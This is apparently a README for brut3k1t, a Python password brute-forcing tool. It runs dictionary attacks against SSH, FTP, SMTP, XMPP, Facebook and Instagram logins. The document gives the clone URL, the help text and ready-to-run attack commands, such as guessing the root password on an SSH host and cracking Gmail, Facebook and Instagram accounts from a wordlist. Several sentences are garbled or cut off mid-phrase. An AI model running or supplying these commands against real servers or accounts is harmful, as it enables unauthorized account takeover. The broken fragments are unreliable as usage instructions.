brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are:
ssh ftp smtp XMPP instagram facebook
There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).
Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have it.
Downloading is simple. Simply
git clone .
git clone https://github.com/ex0dus-0x/brut3k1t
Change to directory:
Utilizing brut3k1t is a little more complicated than just running a Python file.
python brut3k1t -h shows the help menu:
usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS] [-p PORT] [-d DELAY] Server-side bruteforce module written in Python optional arguments: -h, --help show this help message and exit -a ADDRESS, --address ADDRESS Provide host address for specified service. Required for certain protocols -p PORT, --port PORT Provide port for host address for specified service. If not specified, will be automatically set -d DELAY, --delay DELAY Provide the number of seconds the program delays as each password is tried required arguments: -s SERVICE, --service SERVICE Provide a service being attacked. Several protocols and services are supported -u USERNAME, --username USERNAME Provide a valid username for service/protocol being executed -w PASSWORD, --wordlist PASSWORD Provide a wordlist or directory to a wordlist
Cracking SSH server running on
wordlist.txt as a wordlist.
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The program will automatically set the port to 22, but if it is different, specify with
wordlist.txt on port
25 with a 3 second delay. For email it is necessary to use the SMTP server’s address. For e.g Gmail =
smtp.gmail.com . You can research this using Google.
python brut3k1t.py -s smtp -a smtp.gmail.com -u firstname.lastname@example.org -w wordlist.txt -p 25 -d 3
wordlist.txt on default port
5222 . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case
python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt
Cracking Instagram with username
test with wordlist
wordlist.txt and a 5 second delay
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
-pflag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um… web-based. 🙂
-dflag, the default delay in seconds will be 1.
-aflag, when cracking SMTP and XMPP, respectively.
/usr/local/wordlists/wordlist.txtspecify that for the wordlist
21. Please keep that in mind.